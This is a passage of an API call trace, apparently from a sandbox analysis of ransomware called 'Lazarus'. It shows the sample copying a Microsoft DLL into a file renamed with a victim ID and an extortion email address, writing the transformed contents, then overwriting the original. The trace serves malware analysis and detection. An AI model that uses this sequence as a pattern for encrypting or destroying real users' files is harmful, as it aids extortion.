RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0089.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0089.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0089.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0089.193] AreFileApisANSI () returned 1 [0089.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0089.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0089.194] AreFileApisANSI () returned 1 [0089.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0089.194] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0089.194] GetFileType (hFile=0x348) returned 0x1 [0089.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.194] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0089.194] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0089.194] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0089.195] CloseHandle (hObject=0x348) returned 1 [0089.195] AreFileApisANSI () returned 1 [0089.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0089.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0089.195] GetFileType (hFile=0x348) returned 0x1 [0089.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.195] CloseHandle (hObject=0x348) returned 1 [0089.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0089.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0089.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0089.197] AreFileApisANSI () returned 1 [0089.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0089.197] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x2d60)) returned 1 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.197] AreFileApisANSI () returned 1 [0089.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0089.197] GetLastError () returned 0x0 [0089.197] SetLastError (dwErrCode=0x0) [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0089.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0089.197] GetLastError () returned 0x0 [0089.197] SetLastError (dwErrCode=0x0) [0089.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0089.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x60088 [0089.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0089.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0089.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0089.198] AreFileApisANSI () returned 1 [0089.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x60088, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0089.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x4e568 [0089.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x60088, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0089.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0089.198] GetFileType (hFile=0x348) returned 0x1 [0089.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0089.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0089.199] AreFileApisANSI () returned 1 [0089.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0089.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.199] GetFileType (hFile=0x360) returned 0x1 [0089.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0089.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0089.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.199] GetLastError () returned 0x0 [0089.199] SetLastError (dwErrCode=0x0) [0089.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0089.199] GetLastError () returned 0x0 [0089.199] SetLastError (dwErrCode=0x0) [0089.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0089.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0089.199] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0089.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0089.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0089.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x570e0 [0089.463] GetLastError () returned 0x0 [0089.463] SetLastError (dwErrCode=0x0) [0089.463] GetLastError () returned 0x0 [0089.463] SetLastError (dwErrCode=0x0) [0089.463] GetLastError () returned 0x0 [0089.463] SetLastError (dwErrCode=0x0) [0089.463] GetLastError () returned 0x0 [0089.463] SetLastError (dwErrCode=0x0) [0089.464] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.464] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.465] GetLastError () returned 0x0 [0089.465] SetLastError (dwErrCode=0x0) [0089.465] GetLastError () returned 0x0 [0089.465] SetLastError (dwErrCode=0x0) [0089.465] GetLastError () returned 0x0 [0089.465] SetLastError (dwErrCode=0x0) [0089.465] GetLastError () returned 0x0 [0089.465] SetLastError (dwErrCode=0x0) [0089.465] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0xd60, lpOverlapped=0x0) returned 1 [0089.466] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.466] GetLastError () returned 0x0 [0089.466] SetLastError (dwErrCode=0x0) [0089.466] GetLastError () returned 0x0 [0089.466] SetLastError (dwErrCode=0x0) [0089.466] GetLastError () returned 0x0 [0089.466] SetLastError (dwErrCode=0x0) [0089.466] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0089.466] GetLastError () returned 0x0 [0089.466] SetLastError (dwErrCode=0x0) [0089.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0089.466] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327ef70*=0xd60, lpOverlapped=0x0) returned 1 [0089.467] GetLastError () returned 0x0 [0089.467] SetLastError (dwErrCode=0x0) [0089.467] GetLastError () returned 0x0 [0089.467] SetLastError (dwErrCode=0x0) [0089.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0089.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0089.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0089.467] CloseHandle (hObject=0x348) returned 1 [0089.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0089.469] CloseHandle (hObject=0x360) returned 1 [0089.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0089.469] AreFileApisANSI () returned 1 [0089.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0089.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0089.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 92 [0089.469] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.470] GetFileType (hFile=0x360) returned 0x1 [0089.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x570e0 [0089.470] GetLastError () returned 0xb7 [0089.470] SetLastError (dwErrCode=0xb7) [0089.471] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0089.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0089.471] CloseHandle (hObject=0x360) returned 1 [0089.472] AreFileApisANSI () returned 1 [0089.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 